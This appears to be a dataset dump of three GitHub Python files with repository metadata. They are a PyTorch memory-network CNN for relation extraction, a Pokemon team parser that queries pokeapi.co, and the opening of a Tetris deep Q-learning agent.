self.prefix + str(i))\n\n# the position embedding of attention is all you need.\n# https://github.com/jadore801120/attention-is-all-you-need-pytorch/blob/master/transformer/Models.py\ndef position_encoding_init(n_position, d_pos_vector):\n position_encode = np.array([\n [pos / np.power(10000, 2 * (j // 2) / d_pos_vector) for j in range(d_pos_vector)]\n for pos in range(n_position)\n ])\n position_encode[:, 0::2] = np.sin(position_encode[:, 0::2])\n position_encode[:, 1::2] = np.cos(position_encode[:, 1::2])\n return torch.from_numpy(position_encode).type(torch.FloatTensor)\n\n\nclass GroupBatchnorm2d(nn.Module):\n def __init__(self, c_num, group_num = 16, eps = 1e-10):\n super(GroupBatchnorm2d,self).__init__()\n self.group_num = group_num\n self.gamma = nn.Parameter(torch.ones(c_num, 1, 1))\n self.beta = nn.Parameter(torch.zeros(c_num, 1, 1))\n self.eps = eps\n\n def forward(self, x):\n N, C, H, W = x.size()\n\n x = x.view(N, self.group_num, -1)\n\n mean = x.mean(dim = 2, keepdim = True)\n std = x.std(dim = 2, keepdim = True)\n\n x = (x - mean) / (std+self.eps)\n x = x.view(N, C, H, W)\n\n return x * self.gamma + self.beta\n\n# mem net model used for riedel model\nclass MEM_CNN_RIEDEL(nn.Module):\n def __init__(self, settings):\n super(MEM_CNN_RIEDEL, self).__init__()\n\n self.use_cuda = settings['use_cuda']\n self.cuda_devices = [4, 5, 6, 7]\n\n self.word_embed_size = settings['word_embed_size']\n self.vocab_size = settings['vocab_size']\n self.n_rel = settings['n_rel']\n self.hidden_size = 50\n self.features_size = settings['word_embed_size']\n self.tri_attention = settings['tri_attention']\n\n\n self.pos_embed_size = 5\n self.features_size += 2 * self.pos_embed_size\n # define the position embedding effective domain\n # self.max_len = 60\n self.pos_limit = settings['pos_limit']\n # number of output channels for CNN\n # self.out_c = 230\n self.out_c = settings['out_c']\n self.sent_feat_size = self.out_c\n self.dropout_p = settings['dropout_p']\n pre_word_embeds = settings['word_embeds']\n self.version = settings['version']\n self.remove_origin_query = settings['remove_origin_query']\n\n self.w2v = nn.Embedding(self.vocab_size, self.word_embed_size, padding_idx=self.vocab_size-1)\n # word embedding\n if pre_word_embeds is not None:\n self.pre_word_embed = True\n self.w2v.weight.data[:pre_word_embeds.shape[0]] = nn.Parameter(torch.FloatTensor(pre_word_embeds), requires_grad=True)\n else:\n self.pre_word_embed = False\n\n self.position_embedding = settings['position_embedding']\n if settings['position_embedding']:\n self.pos1_embed = nn.Embedding(self.pos_limit * 2 + 1, self.pos_embed_size)\n self.pos2_embed = nn.Embedding(self.pos_limit * 2 + 1, self.pos_embed_size)\n else:\n self.features_size -= 2 * self.pos_embed_size\n\n # too : here we only have one convolution layer, the results only depends on 3 words windows.\n # cannot case big picture results\n # maybe more layers of CNN\n self.window = 3\n self.conv = nn.Conv2d(1, self.out_c, (self.window, self.features_size), padding=(self.window-1, 0), bias=False)\n self.conv_bias = nn.Parameter(torch.zeros(1, self.out_c),requires_grad=True)\n\n self.memory_decay_weight = settings['memory_decay_weight']\n\n # entity embeddings for creating queries\n self.en_embed_size = settings['entity_embed_size']\n # self.n_entity = settings['n_entity']\n pre_en_embeds = settings['entity_pretrained_vecs']\n if pre_en_embeds is not None:\n self.en_embed = nn.Embedding(*pre_en_embeds.shape)\n # here pre_en_embeds are np arrays\n pre_length = pre_en_embeds.shape[0]\n self.en_embed.weight.data[:pre_length] = torch.FloatTensor(pre_en_embeds)\n\n self.bag_size = 30\n self.out_feature_size = self.out_c\n\n self.bag_size = 30\n order_embed = settings['order_embed']\n if order_embed is True:\n self.order_embed_size = 50\n self.order_embed = nn.Embedding(self.bag_size, self.order_embed_size, padding_idx=0)\n self.out_feature_size = self.out_feature_size + self.order_embed_size\n tmp_con = math.sqrt(6.0 / (self.bag_size + self.order_embed_size))\n nn.init.uniform_(self.order_embed.weight, a=-tmp_con, b=tmp_con)\n circular_embedding = settings['circular']\n if circular_embedding:\n self.order_embed.weight.data = position_encoding_init(self.bag_size, self.order_embed_size)\n self.order_embed.weight.requires_grad = False\n else:\n self.order_embed = None\n\n self.use_rank = False\n\n if not settings['scalable_circular']:\n self.order_weight = settings['order_weight']\n else:\n self.order_weight = nn.Parameter(torch.Tensor([1.]), requires_grad=True)\n\n self.r_embed = nn.Parameter(torch.zeros(self.n_rel, self.out_c), requires_grad=True)\n self.r_bias = nn.Parameter(torch.zeros(self.n_rel), requires_grad=True)\n\n self.ln = nn.LayerNorm(self.out_feature_size)\n\n self.query_dim = self.out_feature_size\n self.phi_q = nn.Parameter(torch.randn(self.en_embed_size, self.query_dim), requires_grad=True)\n\n self.atten_sm = nn.Softmax(dim=-1)\n self.pred_sm = nn.LogSoftmax(dim=-1)\n\n\n # normalization over CNN outputs\n # self.group_norm = GroupBatchnorm2d(self.out_c)\n\n self.max_hops = settings['max_hops']\n self.hop_size = 2 if self.version else self.max_hops\n memory_dim = self.query_dim\n for i in range(self.hop_size):\n # also add bias ?\n C = nn.Linear(self.out_feature_size, memory_dim, bias=False)\n # C.weight.data.normal_(0, 0.1)\n C.weight.data = torch.diag(torch.ones(memory_dim))\n self.add_module('C_{}'.format(i), C)\n self.C = AttrProxy(self, 'C_')\n\n self.query_type = settings['query_type']\n if self.query_type == 'SELF':\n self.M = nn.Linear(self.out_feature_size, memory_dim, bias=False)\n\n # relation embedding size is the same as MEM's output\n eye = torch.eye(self.out_c, self.out_c)\n self.att_W = nn.Parameter(eye.expand(self.n_rel, self.out_c, self.out_c), requires_grad=True)\n\n # NLL loss is apllied to logit outputs\n\n # only use for debugging\n self.relu = nn.ReLU()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(p=self.dropout_p, inplace=False)\n\n con1 = math.sqrt(6.0 / ((self.pos_embed_size + self.word_embed_size)*self.window))\n nn.init.uniform_(self.conv.weight, a=-con1, b=con1)\n nn.init.uniform_(self.conv_bias, a=-con1, b=con1)\n\n con = math.sqrt(6.0/(self.out_c + self.n_rel))\n nn.init.uniform_(self.r_embed, a=-con, b=con)\n nn.init.uniform_(self.r_bias, a=-con, b=con)\n\n def forward(self, inputs):\n # the return of cnn is stored as memories for latter query.\n bz = len(inputs)\n # pdb.set_trace()\n mem_bags = self._create_sentence_embedding(inputs)\n # first I try the queries with time.\n # queries = self._create_queries_2(kwargs['en_pairs'])\n if self.query_type == 'ENTITY':\n queries = self._create_queries_2(inputs)\n elif self.query_type == 'SELF':\n queries = self._create_queries_4(inputs, encoding_output=mem_bags)\n else:\n queries = self._create_queries_3(inputs)\n\n # queries = self._create_queries_2(inputs)\n labels = [item['label'] for item in inputs]\n predicts = self._predict_bag(mem_bags, queries, labels=labels)\n if self.training:\n predicts = predicts[torch.arange(0, bz).long().cuda(), labels]\n # score is the same, but normalize over different set!\n scores = torch.matmul(predicts, self.r_embed.t()) + self.r_bias\n pred = self.pred_sm(scores)\n else:\n scores = torch.matmul(predicts, self.r_embed.t()) + self.r_bias\n pred = self.pred_sm(scores.view(-1, self.n_rel)).view(bz, self.n_rel, self.n_rel).max(1)[0]\n return pred\n\n # todo: also wanna use self-attention to form the encoding part.\n def _create_sentence_embedding(self, inputs):\n bags = [item['bag'] for item in inputs]\n batch_features = []\n for ix, bag in enumerate(bags):\n features = []\n for item in bag:\n w2v = self.w2v(item.t()[0])\n # this may need some modification for further use.\n pos1 = self.pos1_embed(item[:, 1])\n pos2 = self.pos2_embed(item[:, 2])\n feature = torch.cat([w2v, pos1, pos2], dim=-1).unsqueeze(0).unsqueeze(0)\n feature = self.conv(feature).squeeze(-1)\n feature = F.max_pool1d(feature, feature.size(-1)).squeeze(-1) + self.conv_bias\n # this tanh is little different from lin-16's.\n feature = self.tanh(feature)\n feature = self.dropout(feature)\n # dropout is a little different too.\n features.append(feature)\n\n # shape : bag_size * D\n features = torch.cat(features, dim=0)\n features = self.dropout(features)\n # features = self.ln(features)\n\n batch_features.append(features)\n return batch_features\n\n def _create_queries(self, en_pairs):\n lookup_var = torch.cuda.LongTensor(en_pairs)\n batch_en_embeds = self.en_embed(lookup_var)\n en1_embeds, en2_embeds = torch.split(batch_en_embeds, 1, dim=1)\n # one ways to compute queries\n queries = torch.matmul((en1_embeds + en2_embeds).view(-1, self.en_embed_size), self.phi_q)\n\n return queries\n\n # query_type : entity + r_embed\n def _create_queries_2(self, inputs, encoding_output=None):\n en_pairs = [item['en_pair'] for item in inputs]\n batch_size = len(en_pairs)\n lookup_var = torch.cuda.LongTensor(en_pairs)\n batch_en_embeds = self.en_embed(lookup_var)\n en1_embeds, en2_embeds = torch.split(batch_en_embeds, 1, dim=1)\n entity_queries = torch.matmul((en1_embeds + en2_embeds).view(-1, self.en_embed_size), self.phi_q)\n # queries = self.r_embed.expand((batch_size, ) + self.r_embed.size()) + entity_queries.unsqueeze(1)\n queries = torch.stack([self.r_embed] * batch_size) + entity_queries.unsqueeze(1)\n return queries\n\n # query_type : r_embed\n def _create_queries_3(self, inputs, encoding_output=None):\n batch_size = len(inputs)\n # without entity queries\n # queries = self.r_embed.expand((batch_size, ) + self.r_embed.size())\n # queries = []\n # for _ in range(batch_size):\n # queries.append(self.r_embed)\n queries = torch.stack([self.r_embed] * batch_size)\n return queries\n\n # query_type : self\n def _create_queries_4(self, inputs, encoding_output=None):\n bz = len(inputs)\n ret = []\n for item in encoding_output:\n ret.append(self.M(item))\n return ret\n\n # this is for riedel-10 dataset\n def _predict_bag(self, mem_bags, queries, labels=None):\n bz = len(labels)\n ret = []\n # trained one by one\n # memory is bag_size * out_dim\n for ix, memory in enumerate(mem_bags):\n # query here is with size : n_rel * D\n query_r = queries[ix]\n\n # query : bag_size * n_rel * query_size\n query = query_r\n\n for hop in range(self.max_hops):\n # key val version\n if self.version == 1:\n m_key = self.C[0](memory)\n m_val = self.C[1](memory)\n # layer sharing version\n elif self.version == 0:\n m_key = self.C[hop](memory)\n m_val = self.C[hop](memory)\n else:\n m_key = memory\n m_val = memory\n # softmax need 2D tensor\n # each query over all memories\n # tmp = torch.matmul(query, m_key.t())\n if self.query_type != 'SELF':\n # tmp = torch.bmm(query.unsqueeze(1),\n # torch.matmul(self.att_W, m_key.t())).squeeze(1)\n tmp = torch.matmul(query, m_key.t())\n else:\n tmp = torch.matmul(query, m_key.t())\n\n prob_size = tmp.size()\n prob = self.atten_sm(tmp.view(-1, m_key.size(0)))\n prob = prob.view(prob_size)\n\n # for each query and each relation\n o_k = torch.matmul(prob, m_val)\n\n # update its query_r\n\n # query = query + o_k * self.memory_decay_weight\n query = query + o_k\n\n # can substract the query vector out to find which is our target.\n # only when D_r == D_q\n # can be compatible with different construction of queries.\n if self.remove_origin_query:\n query = query - query_r\n\n # additional selective attention is applied\n if self.query_type == 'SELF':\n atten_weights = self.atten_sm(torch.bmm(self.r_embed.unsqueeze(1),\n torch.matmul(self.att_W, query.t())).squeeze(1))\n # n_rel * D\n query = torch.matmul(atten_weights, query)\n\n if self.dropout is not None:\n query = self.dropout(query)\n if not self.training:\n query = query * 0.5\n\n # testing this scheme\n # modified = False\n # if modified:\n # labels = labels[ix]\n # if self.training:\n # query = query[0][labels[ix]]\n # score is the same, but normalize over different set!\n # scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n # scores = self.pred_sm(scores.view(1, -1))\n # else:\n # scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n # scores = self.pred_sm(scores.view(-1, self.n_rel)).view(bz, self.n_rel, self.n_rel).max(1)[0]\n #\n # else:\n # scores = self.pred_sm((query * self.r_embed).sum(dim=-1) + self.r_bias)\n ret.append(query)\n # ret.append(scores)\n ans = torch.stack(ret)\n return ans\n\nclass MEM_CNN_WIKI(MEM_CNN_RIEDEL):\n def __init__(self, settings):\n super(MEM_CNN_WIKI, self).__init__(settings)\n self.bilinear = nn.Parameter(torch.randn(self.query_dim, self.out_c), requires_grad=True)\n\n self.query_dim = 100\n memory_dim = self.query_dim\n if self.order_embed is not None:\n memory_dim += self.order_embed_size\n for i in range(self.hop_size):\n # also add bias ?\n C = nn.Linear(self.out_feature_size, memory_dim, bias=False)\n C.weight.data.normal_(0, 0.1)\n self.add_module('C_{}'.format(i), C)\n self.C = AttrProxy(self, 'C_')\n\n self.use_rank = settings['use_rank']\n\n # relation embedding size is the same as MEM's output\n self.r_embed = nn.Parameter(torch.zeros(self.n_rel, self.query_dim))\n self.r_bias = nn.Parameter(torch.randn(self.n_rel), requires_grad=True)\n con = math.sqrt(6.0/(self.query_dim + self.n_rel))\n nn.init.uniform_(self.r_embed, a=-con, b=con)\n nn.init.uniform_(self.r_bias, a=-con, b=con)\n\n self.query_last = settings['query_last']\n\n self.bilinear = nn.Parameter(torch.randn(memory_dim, self.query_dim), requires_grad=True)\n\n self.M_embed = nn.Parameter(torch.rand(self.n_rel, memory_dim), requires_grad=True)\n\n def forward(self, inputs):\n # the return of cnn is stored as memories for latter query.\n bz = len(inputs)\n # pdb.set_trace()\n mem_bags = self._create_sentence_embedding(inputs)\n # first I try the queries with time.\n # queries = self._create_queries_2(kwargs['en_pairs'])\n if self.query_type == 'ENTITY':\n queries = self._create_queries_2(inputs)\n elif self.query_type == 'SELF':\n queries = self._create_queries_4(inputs, encoding_output=mem_bags)\n else:\n queries = self._create_queries_3(inputs)\n\n # queries = self._create_queries_2(inputs)\n labels = [item['label'] for item in inputs]\n pred = self._predict(mem_bags, queries, labels=labels, inputs=inputs)\n return pred\n\n # predcit function for entity-advised query\n def _predict_with_entity(self, mem_bags, queries, labels=None):\n ret = []\n # trained one by one\n # memory is bag_size * out_dim\n for ix, memory in enumerate(mem_bags):\n # query here is with size : 1 * query_dim\n query_r = queries[ix]\n if not self.query_last:\n query_r = torch.cat([query_r] * memory.size(0), dim=0)\n else:\n query_r = query_r.reshape(1, -1)\n\n # maybe should consider limit the bag size of inputs\n lookup_tensor = torch.LongTensor(\n list(range(memory.size(0)))[-self.bag_size:] + \\\n (memory.size(0) - self.bag_size) * [0], requires_grad=True)\n # order_embed : bag_size * order_embed_size\n order_embed = self.order_embed(lookup_tensor)\n order_embed *= self.order_weight\n # query : bag_size * 1 * (order_embed_size + query_size)\n # each indicates a query for answer of one relation\n query = torch.cat([query_r, order_embed], dim=-1)\n memory = torch.cat([memory, order_embed], dim=-1)\n # query_embed = self.C[0](query)\n\n # version is denoting key-val or layer-wise\n # version = 2\n for hop in range(self.max_hops):\n # maybe a key-val embedding, maybe layer embedding.\n if self.version == 1:\n m_key = self.C[0](memory)\n m_val = self.C[1](memory)\n else:\n m_key = self.C[hop](memory)\n m_val = self.C[hop](memory)\n\n # softmax need 2D tensor\n # each query over all memories\n tmp = torch.matmul(query, m_key.t())\n # adding attention-bias\n prob = self.atten_sm(tmp)\n # prob = prob.view(prob_size)\n\n # for each query and each relation\n o_k = torch.matmul(prob, m_val)\n\n # update its query_r\n query = query + o_k\n # can substract the query vector out to find which is our target.\n # query -= query_r\n if self.debug:\n self.debug = False\n query = self.dropout(query)\n scores = torch.matmul(query, self.bilinear)\n\n ret.append(self.pred_sm(scores))\n return ret\n\n # In this version, I use standard memN2N structure\n def _predict(self, mem_bags, queries, labels=None, inputs=None):\n ret = []\n # trained one by one\n # memory is bag_size * out_dim\n for ix, memory in enumerate(mem_bags):\n # query here is with size : n_rel * D\n query_r = queries[ix]\n if not self.query_last:\n # query_r = torch.cat([query_r] * memory.size(0), dim=0)\n query_r = torch.stack([query_r] * memory.size(0))\n else:\n query_r = query_r.unsqueeze(0)\n query = query_r\n\n # maybe should consider limit the bag size of inputs\n if self.use_rank:\n # padding at first\n lookup_tensor = torch.cuda.LongTensor(inputs[ix]['ranks'])\n lookup_tensor += self.bag_size - lookup_tensor[-1] - 1\n lookup_tensor = lookup_tensor.clamp(0, self.bag_size-1)\n else:\n lookup_tensor = torch.cuda.LongTensor(\n list(range(memory.size(0)))[:self.bag_size] + \\\n (memory.size(0) - self.bag_size) * [0])\n # lookup_tensor = torch.tensor(lookup_tensor, =True)\n\n # order_embed : bag_size * order_embed_size\n if self.order_embed is not None:\n order_embed = self.order_weight * self.order_embed(lookup_tensor)\n memory = torch.cat([memory, order_embed], dim=-1)\n order_embed = order_embed.view(order_embed.size(0), 1, order_embed.size(-1))\n order_embed = torch.cat([order_embed] * self.n_rel, dim=1)\n # query : query_size (maybe bag_size) * n_rel * (order_embed_size + query_size)\n\n # suit the case when memory_size != query_size\n order_embed = order_embed[:query.size(0)]\n # each indicates a query for answer of one relation\n query = torch.cat([query_r, order_embed], dim=-1)\n\n attention_bias = torch.triu(torch.ones(query.size(0), query.size(0)), diagonal=1) * (-1e9)\n attention_bias = attention_bias.cuda()\n\n # version is denoting key-val or layer-wise\n # version = 2\n for hop in range(self.max_hops):\n # maybe a key-val embedding, maybe layer embedding.\n if self.version == 1:\n m_key = self.C[0](memory)\n m_val = self.C[1](memory)\n else:\n m_key = self.C[hop](memory)\n m_val = self.C[hop](memory)\n\n # softmax need 2D tensor\n # each query over all memories\n tmp = torch.matmul(query, m_key.t())\n if self.tri_attention:\n tmp += attention_bias.unsqueeze(1) + tmp\n\n # adding attention_bias\n\n prob_size = tmp.size()\n prob = self.atten_sm(tmp.view(-1, m_key.size(0)))\n prob = prob.view(prob_size)\n\n # for each query and each relation\n o_k = torch.matmul(prob, m_val)\n\n # update its query_r\n try:\n query = query + o_k\n except:\n pdb.set_trace()\n # can substract the query vector out to find which is our target.\n query = self.dropout(query)\n if self.order_embed is not None:\n query = torch.matmul(query, self.bilinear)\n\n # after changing with attention pcnn\n modified = False\n if modified:\n # query size is same as memory size\n if self.training:\n query = query[torch.arange(0, query.size(0)).cuda().long(), labels[ix].cuda()]\n # score is the same, but normalize over different set!\n\n scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n scores = self.pred_sm(scores.view(memory.size(0), -1))\n # pdb.set_trace()\n # scores = self.pred_sm(scores.view(1, -1))\n else:\n scores = torch.matmul(query, self.r_embed.t()) + self.r_bias\n scores = self.pred_sm(scores.view(-1, self.n_rel)).view(scores.size(0), self.n_rel, self.n_rel).max(1)[0].view(scores.size(0), -1)\n else:\n scores = (query * self.r_embed).sum(dim=-1) + self.r_bias\n scores = self.pred_sm(scores.view(query.size(0), -1))\n\n ret.append(self.pred_sm(scores))\n return ret","repo_name":"ElliottYan/DS_Temporal","sub_path":"mem_cnn.py","file_name":"mem_cnn.py","file_ext":"py","file_size_in_byte":24564,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"536632703","text":"from pokemon import Pokemon\r\nimport re\r\nimport requests\r\n\r\nclass Player:\r\n \r\n pokemonList = []\r\n \r\n \r\n def __init__(self, pokemonlist):\r\n\r\n self.pokemonNames = []\r\n self.playerPokemonStats = []\r\n pokemondata = []\r\n getdata = re.compile('.+?(?=\\s@|\\s\\()')\r\n \r\n playerdata = pokemonlist.split('\\n\\n')\r\n for i in range(len(playerdata)):\r\n tempPokeData = playerdata[i]\r\n pokemonName = getdata.findall(tempPokeData)[0]\r\n if pokemonName.endswith('-Mega'):\r\n pokemonName = pokemonName[:-5]\r\n self.pokemonNames.append(pokemonName)\r\n else:\r\n self.pokemonNames.append(pokemonName)\r\n print(pokemonName)\r\n \r\n print(self.pokemonNames)\r\n link = 'https://pokeapi.co/api/v2/pokemon/' + pokemonName.lower() + '/'\r\n print(link)\r\n pokemondata.append(requests.get(link))\r\n for i in range(len(playerdata)):\r\n self.pokemonList.append(pokemondata[i].json())\r\n\r\n\r\n counter = 0\r\n for basePokemonStats in self.pokemonList:\r\n #Creates a pokemon using base stats and pokemon data\r\n try:\r\n myPokemonStats = playerdata[self.pokemonList.index(basePokemonStats)]\r\n except IndexError:\r\n break\r\n else:\r\n myPokemonStats = playerdata[self.pokemonList.index(basePokemonStats)]\r\n \r\n #print(myPokemonStats)\r\n self.playerPokemonStats.append(Pokemon(myPokemonStats, basePokemonStats, self.pokemonNames[counter]))\r\n counter+= 1\r\n \r\n\r\n\r\n '''\r\n #Player 1 moves\r\n getmoves = re.compile('(?<=\\-\\s).+')\r\n move = []\r\n for i in range(len(playerdata)):\r\n tempPokeMoves = playerdata[i]\r\n move.append(getmoves.findall(tempPokeMoves))\r\n #add moves to class\r\n '''\r\n\r\n\r\n\r\n \r\n","repo_name":"dinocoder/Pokemon-battle-game","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24362263887","text":"\nimport TetrisAgent\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport random\nimport copy\nimport time\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom Piece import from_array\n\n# This file serves as a template for Tetris AI.\n\n\n\n\n\"\"\" Global Variables \"\"\"\n\nwidth = 10\nheight = 20\ndepth = 2\n\n\"\"\" End Global Variables \"\"\"\n\n\n\n\nclass Net(nn.Module):\n\n def __init__(self, num_convolutions, num_convolutions_bot, linear_sizes, ks, ks_bot, input_shape=(1, depth, height, width), output_shape = 5):\n super(Net, self).__init__()\n \n self.activation = F.relu\n self.input_shape = input_shape\n \n self.conv1 = nn.Conv3d(in_channels=num_convolutions[0],\n out_channels=num_convolutions[1],\n kernel_size=ks[0],\n padding=(0, 2, 2))\n #self.conv1.weight.data.normal_(0, 0.1)\n #self.conv1.bias.data.normal_(0, 0.1)\n \n self.conv2 = nn.Conv3d(in_channels=num_convolutions[1],\n out_channels=num_convolutions[2],\n kernel_size=ks[1],\n padding=(0, 1, 1))\n #self.conv2.weight.data.normal_(0, 0.1)\n #self.conv2.bias.data.normal_(0, 0.1)\n \n self.conv3 = nn.Conv3d(in_channels=num_convolutions[2],\n out_channels=num_convolutions[3],\n kernel_size=ks[2],\n padding=(0, 2, 2))\n #self.conv3.weight.data.normal_(0, 0.1)\n #self.conv3.bias.data.normal_(0, 0.1)\n \n \n # Bottom convolution\n \n self.convBot = nn.Conv3d(in_channels=num_convolutions_bot[0],\n out_channels=num_convolutions_bot[1],\n kernel_size=ks_bot[0],\n padding=(0, 1, 0))\n #self.convBot.weight.data.normal_(0, 0.1)\n #self.convBot.bias.data.normal_(0, 0.1)\n \n \n self.n_size = self._get_conv_output(input_shape)\n self.n_size_bot = self._get_bot_conv_output(input_shape)\n self.linear_sizes = linear_sizes\n self.linear_sizes.insert(0, self.n_size) #+self.n_size_bot)\n \n \n self.fc1 = nn.Linear(linear_sizes[0], linear_sizes[1])\n #self.fc1.weight.data.normal_(0, 0.02)\n #self.fc1.bias.data.normal_(0, 0.02)\n \n self.fc2 = nn.Linear(linear_sizes[1], linear_sizes[2])\n #self.fc2.weight.data.normal_(0, 0.02)\n #self.fc2.bias.data.normal_(0, 0.02)\n \n self.fc3 = nn.Linear(linear_sizes[2], output_shape)\n self.fc3.weight.data.normal_(0, 0.1)\n self.fc3.bias.data.normal_(0, 0.1)\n \n self.loss = nn.MSELoss()\n \n def _get_conv_output(self, shape):\n inp = Variable(torch.rand(1, *shape))\n output_feat = self._forward_features(inp)\n n_size = output_feat.data.view(1, -1).size(1)\n return n_size\n \n def _get_bot_conv_output(self, shape):\n inp_bot = Variable(torch.rand(1, *shape))\n output_feat_bot = self.convBot(inp_bot)\n return output_feat_bot.data.view(1, -1).size(1)\n \n def _forward_features(self, x):\n f = self.conv1\n x = self.activation(f(x))\n x = self.activation(self.conv2(x))\n #x = self.activation(self.conv3(x))\n return x\n \n def forward(self, x):\n self.conv1.double()\n self.conv2.double()\n #self.conv3.double()\n self.convBot.double()\n self.fc1.double()\n self.fc2.double()\n self.fc3.double()\n feat_top = self._forward_features(x)\n #feat_bot = self.activation(self.convBot(x))\n #x = torch.cat([feat_top.view(-1, self.n_size), feat_bot.view(-1, self.n_size_bot)], 1)\n x = feat_top.view(-1, self.n_size)\n x = self.activation(self.fc1(x))\n #x = F.dropout(x, training=self.training)\n x = self.activation(self.fc2(x))\n #x = F.dropout(x, training=self.training)\n x = self.fc3(x)\n return x\n \n def mse_loss(self, inp, target):\n return torch.sum((inp - target) ** 2) / inp.data.nelement()\n\nclass MyAgent(TetrisAgent.TetrisAgent):\n\n ########################\n # Constructor\n ########################state\n def __init__(self, gridWidth, gridHeight, policy=None, optimizer=None, epsilon_min=0.03, epsilon_max = 1.0, epsilon_decay = 200, training=True, batch_size=80, QDepth=1, Gamma=0.99, replay_mem_len = 30000):\n TetrisAgent.TetrisAgent.__init__(self, gridWidth, gridHeight, policy)\n self.use_cuda = torch.cuda.is_available()\n self.Q = policy\n if (self.use_cuda):\n self.Q = torch.nn.DataParallel(self.Q).cuda()\n self.Q.train()\n self.cached_Q = copy.deepcopy(policy)\n self.optimizer = optimizer\n self.epsilon_min = epsilon_min\n self.epsilon_max = epsilon_max\n self.epsilon_decay = epsilon_decay\n self.step = 0\n self.training = training\n self.batch_size = batch_size\n \n self.all_histories = []\n self.replay_memory = []\n self.QDepth = QDepth\n self.Gamma = Gamma\n self.replay_mem_len = replay_mem_len\n \n self.original_history = []\n self.training_history = []\n self.testing_history = []\n \n self.errors = []\n \n self.num_frames = 0\n self.loss = nn.MSELoss()\n \n #############################\n # Define action_from_state\n #\n # The actions are as follows:\n # 0: Move the current piece left, if it is a valid move\n # 1: Move the current piece right, if it is a valid move\n # 2: Rotate the current piece clockwise\n # 3: Rotate the current piece counter-clockwise\n # 4: Drop the piece to the bottom\n # 5: no-op\n ############################# \n def action_from_state(self):\n current_state = self.state\n action = 0\n if (self.training): # epsilon search\n number = random.random()\n eps = self.epsilon_at_step()\n if (number < eps):\n action = random.randint(0, len(self.action_space()) - 1)\n else:\n outputs = self.evaluate(current_state)\n action = np.argmax(outputs.data.cpu().numpy()) # default action\n \n if (self.num_frames % 20 == 0):\n err = self.gradient_step()\n print(str(self.num_frames), err)\n self.errors.append(err)\n \n if (len(self.errors) % 20 == 0):\n self.plot_errors()\n \n # Update the target every 300 iterations\n if (len(self.errors) % 15 == 0):\n self.cached_Q = copy.deepcopy(self.Q)\n \n self.num_frames += 1\n \n else:\n outputs = self.evaluate(current_state)\n action = np.argmax(outputs.data.numpy())\n return action\n \n def plot_errors(self):\n \n \n \n plt.figure(1)\n plt.clf()\n errors = np.array(self.errors)\n plt.title('Training . . .')\n plt.xlabel('Episode')\n plt.ylabel('Error')\n #plt.ylim(0, 100)\n plt.plot(errors)\n plt.pause(0.001)\n \n def generate_replay_memory(self):\n self.training = False\n for i in range(self.replay_mem_len):\n score = self.perform_iteration(rand=True, selective=True)\n print (str(i+1) + \"th replay memory game generated with score \", score)\n self.original_history = copy.deepcopy(self.all_histories)\n print(len(self.original_history))\n \n # Returns values of all actions from a single state\n def evaluate(self, state):\n s = stack(state)\n shape = s.shape\n s = s.reshape((1, 1, shape[0], shape[1], shape[2]))\n data = Variable(torch.from_numpy(s))\n data = data.type(torch.DoubleTensor)\n answer = self.Q(data)\n return answer\n \n def evaluate_cached(self, state):\n s = stack(state)\n shape = s.shape\n s = s.reshape((1, 1, shape[0], shape[1], shape[2]))\n data = Variable(torch.from_numpy(s))\n data = data.type(torch.DoubleTensor)\n answer = self.cached_Q(data)\n return answer\n \n # Returns values of all actions from a group of states\n def evaluate_many(self, in_states, policy):\n s = stack(in_states[0])\n shape = s.shape\n states = np.zeros((len(in_states), 1, shape[0], shape[1], shape[2]))\n states[0] = states[0]\n for i in range(1, len(states)):\n states[i] = stack(in_states[i])\n data = Variable(torch.from_numpy(states))\n data = data.type(torch.DoubleTensor)\n answer = policy(data)\n return answer\n \n # Compute epsilon exploration factor\n def epsilon_at_step(self):\n exp = (-1. * self.step / self.epsilon_decay)\n exp = math.e ** exp\n return self.epsilon_min + (self.epsilon_max - self.epsilon_min) * exp\n \n # Return torch.ByteTensor to condense output of evaluate_many to desired vector\n def action_mask(self, actions):\n actions = np.array(actions)\n mask = np.array([[1 if actions[j] == i else 0 for i in range(len(self.action_space()))] for j in range(len(actions))])\n mask = Variable(torch.from_numpy(mask)).type(torch.ByteTensor)\n return mask\n \n # Performs gradient descent, handles the training\n def gradient_step(self):\n data, actions, rewards, data_next = self.random_batch_samples()\n \n if (self.use_cuda):\n actions = self.action_mask(actions).cuda()\n else:\n actions = self.action_mask(actions)\n values = self.evaluate_many(data, self.Q)\n \n targets = self.Gamma * self.evaluate_many(data_next, self.cached_Q)\n targets = torch.max(targets, 1)[0]\n #print(targets.data.numpy())\n \n rewards = ((Variable(torch.from_numpy(np.array(rewards)), requires_grad=False)).type(torch.DoubleTensor))\n if (self.use_cuda):\n rewards = rewards.cuda()\n \n #print(values, targets, rewards)\n \n targets += rewards\n #targets += np.array(rewards)\n \n #targets = Variable(torch.from_numpy(targets))\n #targets = targets.type(torch.DoubleTensor)\n output = torch.masked_select(values, actions)\n t0 = time.time()\n self.optimizer.zero_grad()\n error = self.loss(output, Variable(targets.data, requires_grad=False))\n error.backward()\n self.optimizer.step()\n #print(output.data.numpy()[0], targets.data.numpy()[0])\n \n return error.data.cpu().numpy()[0]\n \n def train(self, num_iterations):\n print (\"Now training : \\n \\n \")\n self.training = True\n self.Q.train()\n for i in range(num_iterations):\n t0 = time.time()\n reward = self.perform_iteration()\n #print(\"full iteration time: \", time.time() - t0)\n if (self.step % 2 == 0):\n self.visualize([self.all_histories[-1]])\n print(\"Game \" + str(self.step) + \" had a score of \" + str(reward))\n self.step += 1\n \n self.training_history = self.all_histories[self.replay_mem_len:( self.replay_mem_len + num_iterations)]\n \n def test(self, num_iterations):\n self.training = False\n self.Q.eval()\n for i in range(num_iterations):\n reward = self.perform_iteration()\n print(reward)\n \n # Seperate out test results\n lower = self.replay_mem_len + len(self.training_history)\n upper = len(self.all_histories)\n self.testing_history = self.all_histories[lower : upper]\n \n # 